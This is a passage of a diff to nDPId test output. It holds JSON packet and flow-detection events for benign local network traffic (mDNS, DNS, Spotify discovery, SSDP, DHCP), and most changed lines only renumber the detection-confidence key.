00700{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"telegram.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1588779604297,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":238,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":238,"pkt_l4_len":204,"thread_ts_msec":1588779604297,"pkt":"AQBeAAD7wJrQLWJ0CABFAADgDXQAAP8RCsDAqAE14AAA+xTpFOkAzL4AAAAAAAADAAMAAAABCF9ob21la2l0BF90Y3AFbG9jYWwAAAwAAQ9fY29tcGFuaW9uLWxpbmvAFQAMAAEMX3NsZWVwLXByb3h5BF91ZHDAGgAMAAHAJQAMAAEAABGUABANTHVjYeKAmXMgaU1hY8AlwCUADAABAAARlAAOC0x1Y2EncyBpUGFkwCXAOwAMAAEAABGUABIPNTAtMzUtMTAtNzAuMSAxwDsAACkFoAAAEZQAEgAEAA4AMeKa0C1idMCa0C1idA=="} 00729{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"telegram.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1588779604297,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":258,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":258,"pkt_l4_len":204,"thread_ts_msec":1588779604297,"pkt":"MzMAAAD7wJrQLWJ0ht1gBqDxAMwR\/\/6AAAAAAAAAGKCkEok1wBv\/AgAAAAAAAAAAAAAAAAD7FOkU6QDMXFcAAAAAAAMAAwAAAAEIX2hvbWVraXQEX3RjcAVsb2NhbAAADAABD19jb21wYW5pb24tbGlua8AVAAwAAQxfc2xlZXAtcHJveHkEX3VkcMAaAAwAAcAlAAwAAQAAEZQAEA1MdWNh4oCZcyBpTWFjwCXAJQAMAAEAABGUAA4LTHVjYSdzIGlQYWTAJcA7AAwAAQAAEZQAEg81MC0zNS0xMC03MC4xIDHAOwAAKQWgAAARlAASAAQADgAx4prQLWJ0wJrQLWJ0"} 
00810{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"telegram.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1588779604398,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":320,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":320,"pkt_l4_len":286,"thread_ts_msec":1588779604398,"pkt":"jP5XIzfkKDc3AG3ICABFAAEy\/rUAAP8ROBzAqAFNwKgBSxTpFOkBHhkOAACEAAAAAAEAAAAED19jb21wYW5pb24tbGluawRfdGNwBWxvY2FsAAAMAAEAABGUABANTHVjYeKAmXMgaU1hY8AMwDIAIYABAAAAeAATAAAAAMAFCkx1Y2FzLWlNYWPAIcAyABCAAQAAEZQAWBZycEJBPTM5OjJBOjg4OkFDOjQxOkFCCnJwVnI9MTUyLjERcnBIST1mOWM0NmM2ZGQwN2QRcnBITj0zYzVkYzVjZTk1NzgRcnBIQT04Y2E4Y2I3MzFjMWMNTHVjYeKAmXMgaU1hYwxfZGV2aWNlLWluZm\/AHAAQAAEAABGUABoObW9kZWw9aU1hYzExLDMKb3N4dmVycz0xN8BUAAGAAQAAAHgABMCoAU0="} 00822{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"telegram.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1588779606465,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":321,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":321,"pkt_l4_len":287,"thread_ts_msec":1588779606465,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWrCABFAAEzGJdAAEARYHrAqAAB\/\/\/\/\/wBEAEMBHwAAAQEGABAmSTUAAIAAAAAAAAAAAAAAAAAAAAAAANgNF9ZVqwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwIBAwwJVEwtU0cxMTZFPAlUTC1TRzExNkU9BwHYDRfWVav\/"} 
-00694{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":102,"source":"telegram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1588779596464,"flow_last_seen":1588779607307,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":196,"flow_tot_l4_payload_len":480,"flow_avg_l4_payload_len":120,"midstream":0,"thread_ts_msec":1588779607307,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_sleep-proxy._udp.local"}} +00694{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":102,"source":"telegram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1588779596464,"flow_last_seen":1588779607307,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":196,"flow_tot_l4_payload_len":480,"flow_avg_l4_payload_len":120,"midstream":0,"thread_ts_msec":1588779607307,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_sleep-proxy._udp.local"}} 
00602{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"telegram.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1588779607308,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":162,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":162,"pkt_l4_len":108,"thread_ts_msec":1588779607308,"pkt":"MzMAAAD7wJrQLWJ0ht1gBqDxAGwR\/\/6AAAAAAAAAGKCkEok1wBv\/AgAAAAAAAAAAAAAAAAD7FOkU6QBsCTwAAAAAAAEAAQAAAAEMX3NsZWVwLXByb3h5BF91ZHAFbG9jYWwAAAwAAcAMAAwAAQAAEZEAEg81MC0zNS0xMC03MC4xIDHADAAAKQWgAAARlAASAAQADgAx4prQLWJ0wJrQLWJ0"} -00706{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":103,"source":"telegram.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1588779603292,"flow_last_seen":1588779607308,"flow_idle_time":200000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":196,"flow_tot_l4_payload_len":435,"flow_avg_l4_payload_len":145,"midstream":0,"thread_ts_msec":1588779607308,"l3_proto":"ip6","src_ip":"fe80::18a0:a412:8935:c01b","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_sleep-proxy._udp.local"}} +00706{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":103,"source":"telegram.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1588779603292,"flow_last_seen":1588779607308,"flow_idle_time":200000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":196,"flow_tot_l4_payload_len":435,"flow_avg_l4_payload_len":145,"midstream":0,"thread_ts_msec":1588779607308,"l3_proto":"ip6","src_ip":"fe80::18a0:a412:8935:c01b","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": 
{"answer":"_sleep-proxy._udp.local"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":104,"source":"telegram.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779607374,"flow_last_seen":1588779607374,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1588779607374,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":52118,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"telegram.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1588779607374,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1588779607374,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA9u6QAAP8RfGzAqAFNwKgBAcuWADUAKd8a0oUBAAABAAAAAAAAAmluCWFwcGNlbnRlcgJtcwAAAQAB"} -00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"telegram.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779607374,"flow_last_seen":1588779607374,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1588779607374,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":52118,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"in.appcenter.ms","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"telegram.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779607374,"flow_last_seen":1588779607374,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1588779607374,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":52118,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"in.appcenter.ms","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"telegram.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1588779607388,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1588779607388,"pkt":"KDc3AG3IEBMx8Tl2CABFAADD2ppAADkR4vDAqAEBwKgBTQA1y5YArwAA0oWBgAABAAMAAAAAAmluCWFwcGNlbnRlcgJtcwAAAQABwAwABQABAAAAXQAuGWluMi1wcm9kLWVhc3QtdXMyLTIzZmEzMzAOdHJhZmZpY21hbmFnZXIDbmV0AMAtAAUAAQAAAAsAMBNpbjItZ3cyLTA0LWVkZTZmMDZlB2Vhc3R1czIIY2xvdWRhcHAFYXp1cmUDY29tAMBnAAEAAQAAAAUABBQsTvs="} 
-00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":105,"source":"telegram.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1588779607374,"flow_last_seen":1588779607388,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1588779607388,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":52118,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"in.appcenter.ms","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"20.44.78.251"}} +00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":105,"source":"telegram.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1588779607374,"flow_last_seen":1588779607388,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1588779607388,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":52118,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"in.appcenter.ms","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"20.44.78.251"}} 
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"telegram.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779608134,"flow_last_seen":1588779608134,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779608134,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"telegram.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1588779608134,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1588779608134,"pkt":"\/\/\/\/\/\/\/\/wJrQLWJ0CABFAABEQD4AAEARtebAqAE1wKgB\/+EV4RUAMNBmU3BvdFVkcDClWtsnvt2XzwABAACyJIr8D\/N2Z9WO7tpCHKgrvJhaBg=="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"telegram.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779608134,"flow_last_seen":1588779608134,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779608134,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} 
+00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"telegram.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779608134,"flow_last_seen":1588779608134,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779608134,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":134,"source":"telegram.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1588779611135,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1588779611135,"pkt":"\/\/\/\/\/\/\/\/wJrQLWJ0CABFAABE4wYAAEAREx7AqAE1wKgB\/+EV4RUAMNBmU3BvdFVkcDClWtsnvt2XzwABAACyJIr8D\/N2Z9WO7tpCHKgrvJhaBg=="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":139,"source":"telegram.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779611355,"flow_last_seen":1588779611355,"flow_idle_time":200000,"flow_min_l4_payload_len":125,"flow_max_l4_payload_len":125,"flow_tot_l4_payload_len":125,"flow_avg_l4_payload_len":125,"midstream":0,"thread_ts_msec":1588779611355,"l3_proto":"ip4","src_ip":"192.168.1.75","dst_ip":"239.255.255.250","src_port":57916,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00611{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"telegram.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1588779611355,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":167,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":167,"pkt_l4_len":133,"thread_ts_msec":1588779611355,"pkt":"AQBef\/\/6jP5XIzfkCABFAACZH80AAAER55nAqAFL7\/\/\/+uI8B2wAhTXETS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQo="} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":139,"source":"telegram.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779611355,"flow_last_seen":1588779611355,"flow_idle_time":200000,"flow_min_l4_payload_len":125,"flow_max_l4_payload_len":125,"flow_tot_l4_payload_len":125,"flow_avg_l4_payload_len":125,"midstream":0,"thread_ts_msec":1588779611355,"l3_proto":"ip4","src_ip":"192.168.1.75","dst_ip":"239.255.255.250","src_port":57916,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":139,"source":"telegram.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779611355,"flow_last_seen":1588779611355,"flow_idle_time":200000,"flow_min_l4_payload_len":125,"flow_max_l4_payload_len":125,"flow_tot_l4_payload_len":125,"flow_avg_l4_payload_len":125,"midstream":0,"thread_ts_msec":1588779611355,"l3_proto":"ip4","src_ip":"192.168.1.75","dst_ip":"239.255.255.250","src_port":57916,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
00611{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"telegram.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1588779611458,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":167,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":167,"pkt_l4_len":133,"thread_ts_msec":1588779611458,"pkt":"AQBef\/\/6jP5XIzfkCABFAACZnzoAAAERaCzAqAFL7\/\/\/+uI8B2wAhTXETS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQo="} 00611{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":145,"source":"telegram.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1588779611657,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":167,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":167,"pkt_l4_len":133,"thread_ts_msec":1588779611657,"pkt":"AQBef\/\/6jP5XIzfkCABFAACZ2TYAAAERLjDAqAFL7\/\/\/+uI8B2wAhTXETS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQo="} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":164,"source":"telegram.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779615019,"flow_last_seen":1588779615019,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1588779615019,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":61120,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":164,"source":"telegram.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1588779615019,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1588779615019,"pkt":"EBMx8Tl2KDc3AG3ICABFAABHiDkAAP8Rr83AqAFNwKgBAe7AADUAMxxUuQsBAAABAAAAAAAABWU0NTE4BGRzY3gKYWthbWFpZWRnZQNuZXQAAAEAAQ=="} -00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":164,"source":"telegram.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779615019,"flow_last_seen":1588779615019,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1588779615019,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":61120,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e4518.dscx.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":164,"source":"telegram.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779615019,"flow_last_seen":1588779615019,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1588779615019,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":61120,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"e4518.dscx.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":165,"source":"telegram.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1588779615032,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1588779615032,"pkt":"KDc3AG3IEBMx8Tl2CABFAABXJ0xAADkRlqvAqAEBwKgBTQA17sAAQwAAuQuBgAABAAEAAAAABWU0NTE4BGRzY3gKYWthbWFpZWRnZQNuZXQAAAEAAcAMAAEAAQAAAA4ABFx69t8="} -00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":165,"source":"telegram.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1588779615019,"flow_last_seen":1588779615032,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1588779615032,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":61120,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e4518.dscx.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"92.122.246.223"}} 
+00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":165,"source":"telegram.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1588779615019,"flow_last_seen":1588779615032,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1588779615032,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":61120,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e4518.dscx.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"92.122.246.223"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":168,"source":"telegram.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779615961,"flow_last_seen":1588779615961,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1588779615961,"l3_proto":"ip4","src_ip":"192.168.1.52","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":168,"source":"telegram.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1588779615961,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":91,"pkt_l4_len":57,"thread_ts_msec":1588779615961,"pkt":"AQBeAAD78KNaMBgSCABFAABNRwcAAP8R0cDAqAE04AAA+xTpFOkAOcUdAAAAAAACAAAAAAAABV9yYW9wBF90Y3AFbG9jYWwAAAyAAQhfYWlycGxhecASAAyAAQ=="} 
-00677{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":168,"source":"telegram.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779615961,"flow_last_seen":1588779615961,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1588779615961,"l3_proto":"ip4","src_ip":"192.168.1.52","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_raop._tcp.local"}} +00677{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":168,"source":"telegram.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779615961,"flow_last_seen":1588779615961,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1588779615961,"l3_proto":"ip4","src_ip":"192.168.1.52","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": 